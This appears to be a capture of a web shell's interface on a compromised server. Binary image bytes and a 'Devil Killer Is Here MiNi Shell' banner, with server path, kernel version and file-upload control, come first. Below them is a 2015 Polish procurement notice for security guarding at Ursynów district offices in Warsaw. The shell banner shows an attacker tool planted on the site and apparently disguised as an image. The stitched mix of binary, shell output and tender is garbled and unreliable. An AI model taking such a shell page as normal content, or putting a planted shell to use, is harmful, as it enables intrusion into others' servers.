JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151106/300428-N-2015.html

<p class="kh_header"><b>Warszawa: Ochrona osób i mienia w obiektach Urzędu Dzielnicy Ursynów m.st. Warszawy, przy Al. KEN 61 i ul. Dereniowej 52/54 w Warszawie</b><br>
<b>Numer ogłoszenia: 300428 - 2015; data zamieszczenia: 06.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Stołeczne Warszawa Dzielnica Ursynów , al. Komisji Edukacji Narodowej 61, 02-777 Warszawa, woj. mazowieckie, tel. 022 5457100, faks 022 5457291.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ursynow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona osób i mienia w obiektach Urzędu Dzielnicy Ursynów m.st. Warszawy, przy Al. KEN 61 i ul. Dereniowej 52/54 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi ochrony osób i mienia w obiektach Urzędu Dzielnicy Ursynów m. st. Warszawy, przy Al. KEN 61 i ul. Dereniowej 52/54 w Warszawie polegające na:
1)zapewnieniu bezpieczeństwa osób znajdujących się w granicach Obiektów, wymienionych w § 1Umowy,
2)ochronie Obiektów, o których mowa w § 1 i pomieszczeń w tych Obiektach przed dostępem do nich osób nieuprawnionych,
3)ochronie mienia w Obiektach, o których mowa w §1, przed kradzieżą, zniszczeniem lub uszkodzeniem,
4)zapobieganiu zakłóceniom porządku na terenie Obiektów, o których mowa
w § 1 oraz powiadamianiu właściwego pracownika Delegatury Biura Organizacji Urzędu oraz Naczelnika Wydziału Administracyjno-Gospodarczego i Informatyki lub osoby odpowiedzialnej za administrowanie Obiektami o zdarzeniach powodujących naruszenie porządku,
5)niezwłocznym powiadamianiu organów ścigania o czynach przestępczych zaistniałych na terenie Obiektów, o których mowa w § 1 i zabezpieczeniu miejsca ich popełnienia do czasu przybycia organów ścigania,
6)kontroli ruchu osobowego w godzinach i poza godzinami pracy Urzędu oraz ruchu materiałowego, na terenie Obiektów, o których mowa w § 1,  
7)prowadzeniu dokumentacji ochronnej przewidzianej w Tabelach Służby Ochrony, stanowiących załącznik nr 1 do Umowy, a zwłaszcza dziennika zmiany zawierającego dane o czasie rozpoczęcia i zakończenia zmiany, obsadzie personalnej zmiany oraz o rozmieszczeniu poszczególnych pracowników ochrony i czasie wykonywania przez nich zadań, a także prowadzeniu na bieżąco raportu zmiany zwierającego wszystkie istotne informacje dotyczące przyjęcia, przebiegu i przekazania służby ochronnej,
8)obsłudze systemów zabezpieczenia technicznego, zainstalowanych w obiekcie Al. KEN 61, systemów sygnalizacji alarmu pożaru, systemu monitorowania instalacji technicznych i zagrożeń w budynku oraz reagowaniu na sygnały alarmowe,
9) obowiązkowym kierowaniu pracowników, zatrudnionych w obiektach wymienionych w § 1 Umowy na szkolenia w zakresie obsługi systemów zabezpieczeniowych i alarmowych organizowanych przez Zamawiającego,
10)dysponowaniu Centrum Monitorowania Sygnałów Alarmowych do dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
11)dysponowaniu zmotoryzowanymi i wyposażonymi w środki przymusu bezpośredniego oraz łączności bezprzewodowej zewnętrznej i wewnętrznej Grupami Interwencyjnymi do wykonania zadań określonych w Procedurze działania grupy interwencyjnej stanowiącej zał. nr 5 do Umowy.
Do realizacji przedmiotu zamówienia, w całym okresie jego realizacji, Wykonawca zobligowany jest zatrudnić 25 osób posiadających wpis na listę kwalifikowanych pracowników ochrony do wykonywania czynności pracownika ochrony fizycznej na podstawie umowy o pracę w pełnym wymiarze czasu pracy, w tym co najmniej 15 osób ze znajomością obsługi komputera w stopniu podstawowym. 
Szczegółowy opis przedmiotu zamówienia określa również 
a)Wzór Umowy, stanowiący załącznik nr 9 do SIWZ wraz z: 
Zał. Nr 1 do umowy - Tabela Służby Ochrony
Zał. Nr 2 do umowy - Instrukcja Kontroli Ruchu Osobowo-Materiałowego
Zał. Nr 3 do umowy - Instrukcja Alarmowa
Zał. Nr 4 do umowy - Instrukcja dotycząca Zasad Gospodarki Kluczami w urzędzie m. st. Warszawy
Zał. Nr 5 do umowy - Procedura działania grupy interwencyjnej.
b)Formularz cenowy - stanowiący załącznik nr 3 do SIWZ.

Termin realizacji zamówienia: od dnia 15.12.2015 r. od godz. 12:00 do dnia 15.12.2016 do godz. 12:00..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych, o łącznej wartości do 20% wartości zamówienia podstawowego. Zamówienia uzupełniające będą powtórzeniem tego samego rodzaju usług, zgodnych z przedmiotem zamówienia podstawoweg</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości 10 000,00 zł (słownie: dziesięć tysięcy złotych).
2. Wadium może być wniesione w formach przewidzianych w art. 45 ust.6 ustawy Prawo   zamówień publicznych tj. w
a) pieniądzu na rachunek bankowy Zamawiającego - Bank Handlowy 
w Warszawie S.A., 82 1030  1508 0000 0005 5001 3037 z dopiskiem tytułem wadium w postępowaniu na: Ochrona osób i mienia w obiektach Urzędu Dzielnicy Ursynów m.st. Warszawy, przy Al. KEN 61 i ul. Dereniowej 52/54 w Warszawie, nr KZP-XII-WZP.271.84.2015
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. Nr 109, poz.1158, z późn. zm.).
3.Wadium musi być wniesione do Zamawiającego najpóźniej w terminie ostatecznego składania  ofert, tj. do dnia 16. 11. 2015 r. do godz. 11:00.
Uwaga!: 
W przypadku wnoszenia wadium w formie pieniądza, Zamawiający uzna, iż wadium zostało wniesione w terminie, jeżeli kwota wadium zostanie uznana przez rachunek Zamawiającego najpóźniej do ostatecznego terminu składania ofert.
4.Szczegółowe wymagania dotyczące wnoszenia wadium określone zostały w pkt 23 SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada aktualną koncesję wydaną przez ministra właściwego do spraw wewnętrznych na prowadzenie działalności gospodarczej w zakresie ochrony fizycznej stałej lub doraźnej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych - na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jedn. Dz. U. z  2014 r., poz. 1099, ze zm.).

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt 8. Z treści załączonego oświadczenia i dokumentów  musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w przedmiotowym postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie) wykonał1 (tj. zakończył) lub wykonuje2, co najmniej trzy usługi ochrony fizycznej osób i mienia w obiektach użyteczności publicznej o wartości nie mniejszej niż 300.000,00 zł brutto każda przez okres co najmniej 12 miesięcy każda.

UWAGA:
1) Za wykonaną usługę Zamawiający uzna taką usługę, którą Wykonawca wykonał w ramach jednej umowy i której przedmiot został odebrany przez Zamawiającego, jako wykonany należycie.
2)  W przypadku, gdy Wykonawca wykaże się usługą, która jest w toku realizacji tzn. jest wykonywana w ramach jednej umowy, Zamawiający uzna warunek za spełniony, jeżeli na dzień składania ofert wartość, za którą niniejsza usługa została wykonana opiewa na kwotę nie mniejszą niż 300.000,00 zł brutto oraz okres świadczenia usługi - będzie nie krótszy niż okres 12 miesięcy.
3)Przez obiekt użyteczności publicznej - należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny.

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt 8. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamówienia legitymującymi się odpowiednimi kwalifikacjami zawodowymi tj.: Wykonawca dysponuje lub będzie dysponować, co najmniej 25 osobami wpisanymi na listę kwalifikowanych pracowników ochrony fizycznej prowadzoną zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jedn. Dz. U. z  2014 r., poz. 1099, ze zm.).

Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w systemie 1 lub 0, zgodnie z formułą spełnia-nie spełnia w oparciu o informacje zawarte w oświadczeniu i dokumentach wyszczególnionych w pkt 8. Z treści załączonego oświadczenia i dokumentów musi wynikać jednoznacznie, iż w/w warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowodami, o których mowa w części III pkt. 4.1)  Ogłoszenia są:
a)   poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
b) oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a). Ww. dokument musi zawierać przyczyny braku możliwości uzyskania poświadczenia.

 W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w niniejszej uwadze.

III.6.2.) 
W przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych - innego/ych podmiotu/ów, niezależnie od charakteru prawnego łączących go z nim/i stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tego/tych podmiotu/ów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
 Dokument ten powinien w szczególności zawierać następujące informacje:
a) zakres dostępnych wykonawcy zasobów innego podmiotu;
b) sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia;
c) charakter stosunku jaki będzie łączył Wykonawcę z innym podmiotem;
d) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.
Wzór zobowiązania stanowi załącznik nr 10 do SIWZ.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy PZP, odpowiada solidarnie z Wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.

III.6.3) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

III.6.4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1.Oświadczenie wymienione w pkt III.4.1) Ogłoszenia w zakresie: art. 22 ust. 1 pkt 1-4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólnie (podpisane przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, tj. uprawnionych ich przedstawicieli lub przez umocowanego Pełnomocnika), potwierdzając iż określone przez Zamawiającego warunki spełniają razem.
2. Dokumenty wymienione w pkt III.4.1) Ogłoszenia winien przedłożyć jeden albo więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tak aby potwierdzić łączne spełnianie warunku, którego dotyczy.
3. Oświadczenie wymienione w pkt III.4.2.) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. Zamawiający dopuszcza aby niniejszy dokument został złożony wspólnie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, lecz w takiej sytuacji na niniejszym dokumencie wymagany jest podpis każdego uprawnionego przedstawiciela Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia.
4. Dokument wymieniony w pkt III.4.2) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia.
5. Dokument (odpowiedni) o którym mowa w pkt III.4.4) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. Zamawiający dopuszcza aby niniejszy dokument został złożony wspólnie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, lecz w takiej sytuacji na niniejszym dokumencie wymagany jest podpis każdego uprawnionego przedstawiciela Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - LICZBA OSÓB POSIADAJĄCYCH PRZESZKOLENIE W ZAKRES PIERWSZEJ POMOCY W STOPNIU PODSTAWOWYM  SPOŚRÓD 25 OSÓB PRZEWIDZIANYCH DO REALIZACJI ZAMÓWIENIA - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
 http://aukcje.um.warszawa.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie:
-Zmiany kadry, tj. osób które będą uczestniczyły wykonywaniu zamówienia, w szczególności z powodu zdarzeń losowych, tj. śmierć, choroba, ustanie stosunku pracy, przy czym w odniesieniu powyższych osób muszą one posiadać co najmniej kwalifikacje, o których mowa w pkt 7.2. lit. c) SIWZ. 
-Zmniejszenia wynagrodzenia z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia.
-Zmiany wewnętrznych przepisów Zamawiającego wpływających na treść załączników nr 1-5 do wzoru umowy, tj. zmiany treści tabeli służby ochrony, instrukcji kontroli ruchu osobowo-materiałowego, instrukcji alarmowej, instrukcji dotyczącej zasad gospodarki kluczami w Urzędzie m.st. Warszawy-Dzielnicy Ursynów oraz procedury działania grupy interwencyjnej.
